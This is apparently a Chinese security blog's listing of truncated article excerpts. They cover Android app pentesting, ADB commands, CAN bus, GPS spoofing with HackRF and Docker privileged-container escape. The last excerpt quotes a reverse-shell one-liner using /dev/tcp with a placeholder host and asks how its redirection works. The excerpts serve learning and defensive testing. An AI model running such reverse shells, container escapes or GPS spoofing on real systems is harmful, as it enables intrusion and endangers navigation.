实验室采购了一批EDIMAX AC17500网卡，插上Kali发现无法识别。 这批网卡的型号EDIMAX AC1750又名EW-7833UAC，这是网上搜索到的资料，在官网上仅提供了Fedora和Ubuntu的驱动，且支持的内核版本都比较低。 于是就在网上搜到了这个GitHub项目： GitHub

在对车机的Linux系统做用户最小化检查时遇到用户复杂、不好判断的情况。大部分系统中会运行着各种服务进程，这些服务会创建各种用户用来专门运行各自的进程。所以在判断系统是否存在多余用户的时候，没有一个明确的规则，判断模糊，效率低下。 在网上搜寻查阅了Linux用户相关的信息，了解了Linux用户类型、

签名过程类似于对文件办法数字证书。签名后的APK文件在安装时，Android系统会对其进行验证，以确保文件未被篡改且来自“可信的开发者”。“可信的开发者”我打上了双引号，因为默认的情况下安卓没有办法判断开发者是否可信。 签名机制 APK签名的原理基于公钥加密和数字证书的机制。具体来说，签名过程包括以

一、Activity组件暴露测试 Activity是Android应用程序与用户进行交互的窗口，可以简单理解为一个activity就是一个窗口，创建一个activity就是创建一个窗口界面。 exported属性影响了Activity的可访问性，当exported属性设置为true时，该Activi

apk文件 在安卓平台APP渗透测试中，了解apk文件的结构是基础且重要的一步。apk文件，即Android Package Kit，是安卓平台应用程序的安装包文件。apk文件实际上是一个标准的zip格式压缩包，通过解压该压缩包，我们可以获得其内部的文件结构。这些文件结构包括应用程序的源代码、资源文

CAN协议和CAN FD协议的区别主要体现在以下几个方面： 传输速率 CAN协议的最大传输速率为1Mbps。 CAN FD（CAN with Flexible Data-Rate）协议的传输速率则更为灵活，其仲裁比特率最高可达1Mbps（与CAN相同），但数据比特率则能提升至最高8Mbps，大大提高

做GPS欺骗实验前需要准备点东西，一个是GNU Radio，相当于是hackrf的运行库，它提供了hackrf_info、hackrf_transfer这些命令；第二个是gps-sdr-sim这个开源项目，使用广播星历文件生成伪造GPS的信号文件，hackrf只负责发送信号不负责伪造，所以伪造的工作

常用的ADB调试指令： 启动和停止ADB服务 adb start-server：启动ADB服务。 adb kill-server：停止ADB服务。 设备连接管理 adb devices：列出所有已连接的Android设备或模拟器。 adb connect <device-ip>:<port>：通过T

一、危险配置 1. Privileged特权模式 利用条件：容器以特权模式运行 docker run --privileged 以特权模式运行的容器可以访问宿主机上的所有设备。 可以在容器中挂载宿主机的磁盘，然后将根目录切换过去。 2. SYS_ADMIN 利用条件： 以root身份运行容器。 使用

今天在学习反弹shell，遇到一个经典的构造： /bin/bash -i &> /dev/tcp/host/port 0>&1 对语句最后的0>&1我百思不得其解，为什么标准输入重定向到标准输出，攻击端输入的指定就到本机来了呢？标准输入指的是本机键盘输入吗？键盘输入重定向到屏幕不应该就是默认的吗？这